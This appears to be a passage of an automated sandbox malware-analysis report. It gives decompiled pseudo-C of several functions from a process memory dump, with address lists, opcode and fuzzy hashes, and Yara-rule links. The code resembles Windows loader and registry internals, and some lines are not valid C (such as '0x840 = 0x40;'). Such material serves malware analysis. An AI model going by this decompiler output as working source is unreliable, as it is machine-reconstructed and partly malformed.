								_push(0x23);
								_push(0xffffffff);
								_t193 = E046396C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x0460849b
0x0460849b
0x0460849b
0x0460849b
0x0460849d
0x046084a2
0x046084a7
0x046084b1
0x046084d8
0x00000000
0x046084b3
0x046084c4
0x046084c9
0x046084cd
0x046084cf
0x046084cf
0x046084d6
0x046084e6
0x046084e9
0x046084ec
0x046084ef
0x046084f2
0x046084f4
0x046084fc
0x04608501
0x04608506
0x04608509
0x046086e0
0x046086e5
0x046086e8
0x046086ed
0x046086f0
0x046086f2
0x04659afd
0x04659b02
0x046084da
0x046084df
0x046084df
0x046086fa
0x046086fd
0x046086fe
0x04608701
0x04608706
0x04608709
0x0460870b
0x00000000
0x00000000
0x04608711
0x04608725
0x04608727
0x0460872a
0x0460872c
0x04659af0
0x04659af5
0x04608732
0x04608732
0x04608732
0x04608735
0x04608737
0x04608515
0x04608515
0x04608518
0x0460851d
0x04608523
0x04608527
0x0460852b
0x04608537
0x04608539
0x0460853c
0x0460853e
0x0460868c
0x04608691
0x04608699
0x0460869b
0x04608744
0x04608748
0x046086a1
0x046086a1
0x046086a1
0x046086a4
0x046086a8
0x04659bdf
0x04659bdf
0x046086ae
0x046086b0
0x00000000
0x046086b6
0x00000000
0x04659be9
0x046086b0
0x04608544
0x0460854a
0x0460854d
0x04608551
0x0460876e
0x04608778
0x0460877b
0x04608780
0x04608557
0x04608557
0x0460855d
0x0460855d
0x0460856b
0x0460856e
0x04608570
0x04608573
0x04608576
0x04608576
0x04608579
0x0460857b
0x00000000
0x00000000
0x04608581
0x046085a0
0x046085a2
0x046085a5
0x046085a7
0x04659b1b
0x04659b1b
0x0460862e
0x0460862e
0x04608631
0x04608631
0x04608634
0x04608636
0x04608669
0x04608669
0x0460866b
0x04659bbf
0x04659bc4
0x04659bc8
0x04659bce
0x04659bce
0x04608671
0x04608671
0x04608674
0x04608676
0x04659bae
0x04659bae
0x04608676
0x0460867c
0x0460867e
0x04608688
0x04608688
0x00000000
0x0460867e
0x04608638
0x04608638
0x0460863b
0x0460863e
0x0460863f
0x04608642
0x04608645
0x04608648
0x0460864d
0x04659b69
0x04659b6e
0x04659b7b
0x04659b81
0x04659b85
0x04659b89
0x04659ba7
0x04659b8b
0x04659b91
0x04659b9a
0x04659b9f
0x04659b9f
0x04608788
0x0460878d
0x04608763
0x04608763
0x04608766
0x00000000
0x04608766
0x04659b70
0x00000000
0x04659b70
0x04608656
0x0460865a
0x0460865c
0x04608752
0x04608756
0x00000000
0x00000000
0x0460875e
0x00000000
0x0460875e
0x04608662
0x04608662
0x04608662
0x04608666
0x00000000
0x04608666
0x046085b7
0x046085b9
0x046085bc
0x046085bf
0x046085cc
0x046085d1
0x046085d4
0x046085db
0x046085de
0x046085e0
0x04659b5f
0x00000000
0x04659b5f
0x046085e6
0x046085ea
0x046086c3
0x046086c5
0x046086c8
0x046086ca
0x04659b16
0x00000000
0x04659b16
0x046086d6
0x046085f6
0x046085f6
0x046085f9
0x04608602
0x04608606
0x0460860a
0x0460860b
0x0460860e
0x04608611
0x00000000
0x04608611
0x046085f3
0x00000000
0x046085f3
0x04608619
0x0460861e
0x0460861e
0x04608621
0x04608622
0x04608623
0x04608625
0x0460862c
0x00000000
0x0460873d
0x00000000
0x0460873d
0x04608737
0x0460850f
0x04608512
0x00000000
0x04608512
0x00000000
0x046084d6

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3684eeaf6f538b5382a01925d5170887eae48b1ba731110c02e614815a7d06fa
Instruction ID: a057be4d3805d8c05c4671b3e8f7418369b13bc61e6ed1c4fcd50052150c7fda
Opcode Fuzzy Hash: 3684eeaf6f538b5382a01925d5170887eae48b1ba731110c02e614815a7d06fa
Instruction Fuzzy Hash: 3FB127B0E00209DFDB19EFA9C984AAEBBB5BF44304F148529E405AB395F770BD46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0462513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0462513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x46ed360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0463D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E04612280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L04614620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0463F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0460FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x46eb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0463B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x04625142
0x0462514c
0x04625150
0x04625157
0x04625159
0x0462515e
0x04625165
0x04625169
0x0462516c
0x04625172
0x04625176
0x0462517a
0x0462517a
0x0462517a
0x0462517f
0x04666d8b
0x04666d8e
0x04666d91
0x04666d95
0x04666d98
0x04666d9c
0x04666da0
0x04666da3
0x04666da7
0x04666e26
0x04666e26
0x04666e2a
0x046251f9
0x046251f9
0x046251fe
0x04666e33
0x04666e33
0x04666e39
0x04666e3d
0x04666e46
0x04666e50
0x00000000
0x00000000
0x04666e52
0x04666e53
0x04666e56
0x04666e5d
0x00000000
0x00000000
0x00000000
0x04666e5f
0x04666e67
0x04666e77
0x04666e7f
0x04666e80
0x04666e88
0x04666e90
0x04666e9f
0x04666ea5
0x04666ea9
0x04666eb1
0x04666ebf
0x00000000
0x00000000
0x04666ecf
0x04666ed3
0x00000000
0x00000000
0x04666edb
0x04666ede
0x04666ee1
0x04666ee8
0x04666eeb
0x04666eed
0x04666ef0
0x04666ef4
0x04666ef8
0x04666efc
0x00000000
0x00000000
0x04666f0d
0x04666f11
0x04666f32
0x04666f37
0x04666f3b
0x04666f3e
0x04666f41
0x04666f46
0x00000000
0x00000000
0x04666f4c
0x04666f50
0x04666f50
0x04666f54
0x04666f62
0x04666f65
0x04666f6d
0x04666f7b
0x04666f7b
0x04666f93
0x04666f98
0x04666fa0
0x04666fa6
0x04666fb3
0x04666fb6
0x04666fbf
0x04666fc1
0x04666fd5
0x04666fda
0x04666fda
0x04666fdd
0x04666fe2
0x04666fe7
0x04666feb
0x04666fef
0x04666ff3
0x0462520c
0x0462520c
0x0462520f
0x04625215
0x04625234
0x0462523a
0x0462523a
0x04625244
0x04625245
0x04625246
0x04625251
0x04625251
0x04666f13
0x04666f17
0x04666f17
0x04666f18
0x04666f1b
0x04666f1f
0x04666f23
0x00000000
0x04666f28
0x04625204
0x04625204
0x04625208
0x00000000
0x04625208
0x04625185
0x04625188
0x0462518a
0x0462518e
0x04625195
0x04666db1
0x04666db5
0x04666db9
0x0462519b
0x0462519b
0x0462519e
0x046251a7
0x046251a9
0x046251a9
0x046251b5
0x046251b8
0x046251bb
0x046251be
0x046251c1
0x046251c5
0x046251c9
0x046251cd
0x046251cd
0x046251d8
0x046251dc
0x046251e0
0x04666dcc
0x04666dd0
0x04666dd5
0x04666ddd
0x04666de1
0x04666de1
0x04666de5
0x04666deb
0x04666df1
0x04666df7
0x04666dfd
0x04666e01
0x04666e05
0x04666e09
0x04666e0d
0x04666e11
0x04666e11
0x046251eb
0x04666e1a
0x04666e1f
0x04666e21
0x04666e23
0x00000000
0x046251f1
0x046251f1
0x00000000
0x046251f1

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 356882e6a29d54a1aa1a7509bb3cd1dde6fd2d420a774e5b951ddd1a7e784893
Instruction ID: 3ba0f03e01216ed36e143e934900ac4b1ffe9b141ed69906b8b3c96ee99b9a8e
Opcode Fuzzy Hash: 356882e6a29d54a1aa1a7509bb3cd1dde6fd2d420a774e5b951ddd1a7e784893
Instruction Fuzzy Hash: 9EC112756093809FD354CF28C580A5AFBE1BF88308F14496EF89A9B352E771E945CF42

Uniqueness

Uniqueness Score: -1.00%

Function 046203E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E046203E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x46ed360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E04620548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0463B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0460B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x46e7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E04617D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E04617D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E04677016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E04639830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E046769A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x46e7c04 != 0) {
						_t118 = _v12;
						_t120 = E0467A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x46e7bd8;
						if( *0x46e7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E046395D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E046399A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E04673540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E045FB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0463AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x46e8474 - 3;
										if( *0x46e8474 != 3) {
											 *0x46e79dc =  *0x46e79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E04617D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E04617D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E04677016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x46e8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x46e7b00; // 0x0
							asm("ror esi, cl");
							 *0x46eb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E046395D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E04607F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x046203f1
0x046203f7
0x046203f9
0x046203fb
0x046203fd
0x04620400
0x0462040a
0x04664c7a
0x04620537
0x04620547
0x04620410
0x04620410
0x04620414
0x04620417
0x0462041a
0x04620421
0x04620424
0x0462042b
0x0462043b
0x0462043e
0x0462043f
0x0462043f
0x04620446
0x04620449
0x0462044c
0x0462044f
0x04620459
0x04664c8d
0x0462045f
0x0462045f
0x0462045f
0x04620467
0x04664c97
0x04664c9d
0x04664ca4
0x04664caa
0x04664caf
0x04664cb1
0x04664cc3
0x04664cb3
0x04664cbc
0x04664cbc
0x04664cc8
0x04664ccb
0x04664cd7
0x04664cda
0x04664cdf
0x04664cdf
0x04664ccb
0x04664ca4
0x0462046d
0x0462046f
0x0462046f
0x04620471
0x04620476
0x0462047a
0x0462047b
0x04620483
0x04620489
0x0462048d
0x00000000
0x00000000
0x04664ce9
0x04664cef
0x04664d22
0x04664d22
0x00000000
0x04664d22
0x04664cf1
0x04664cf7
0x00000000
0x00000000
0x04664cf9
0x04664cff
0x00000000
0x00000000
0x04664d05
0x04664d07
0x00000000
0x00000000
0x04664d0d
0x04664d0f
0x04664d14
0x04664d16
0x00000000
0x00000000
0x04664d1c
0x04664d1c
0x04620499
0x04620535
0x04620535
0x00000000
0x04620535
0x046204a6
0x04664d2c
0x04664d37
0x04664d39
0x04664d3b
0x00000000
0x00000000
0x04664d41
0x04664d48
0x04620527
0x0462052b
0x0462052d
0x04620530
0x04620530
0x00000000
0x0462052b
0x04664d4e
0x046204ac
0x046204ac
0x046204af
0x046204b2
0x046204b7
0x046204b9
0x046204bb
0x046204bd
0x046204bf
0x046204c5
0x046204c9
0x04664d53
0x04664d59
0x04664db9
0x04664dba
0x04664dbf
0x04664dc2
0x04664dc4
0x04664dc7
0x04664dce
0x00000000
0x04664dce
0x04664d5b
0x04664d61
0x00000000
0x00000000
0x04664d63
0x04664d69
0x00000000
0x00000000
0x04664d6b
0x04664d6e
0x04664d74
0x04664d76
0x04664d7c
0x04664d7e
0x04664d84
0x04664d89
0x04664d8c
0x04664d8d
0x04664d92
0x04664d95
0x04664d96
0x04664d98
0x04664d9a
0x04664d9f
0x04664da4
0x04664da6
0x04664da8
0x04664daf
0x04664db1
0x04664db1
0x04664daf
0x04664da6
0x04664d84
0x04664d7c
0x00000000
0x04664d74
0x046204d6
0x04664de1
0x046204dc
0x046204dc
0x046204dc
0x046204e4
0x04664deb
0x04664df1
0x04664df8
0x04664dfe
0x04664e03
0x04664e05
0x04664e17
0x04664e07
0x04664e10
0x04664e10
0x04664e1c
0x04664e1f
0x04664e35
0x04664e35
0x04664e1f
0x04664df8
0x046204f1
0x046204fa
0x04664e3f
0x04664e47
0x04664e5b
0x04664e61
0x04664e67
0x04664e69
0x04664e71
0x04664e73
0x04620500
0x04620500
0x04620500
0x046204fa
0x04620508
0x0462051d
0x0462051d
0x0462051f
0x04620524
0x00000000
0x04620524
0x04620515
0x04620517
0x04664e7a
0x04664e7c
0x00000000
0x00000000
0x04664e85
0x00000000
0x04664e85
0x00000000
0x04620517

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eed23c8d2c5ba0f996baf3d6a387c50455e69580b02c6d143a3bab32aca8756a
Instruction ID: 9fa630994b313cf8d9728bf7c2a5dcd503b6f10fefd3630ead717a8e7dd17a63
Opcode Fuzzy Hash: eed23c8d2c5ba0f996baf3d6a387c50455e69580b02c6d143a3bab32aca8756a
Instruction Fuzzy Hash: B1913B71E00B65FFEB219B68C944BAD77A4EB01718F054266EA11AB3D1FB74BD00CB85

Uniqueness

Uniqueness Score: -1.00%

Function 045FC600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E045FC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x46ed360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E04606D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0463B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x46e7b9c; // 0x0
					_t74 = L04614620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E04639650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L046177F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0463F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
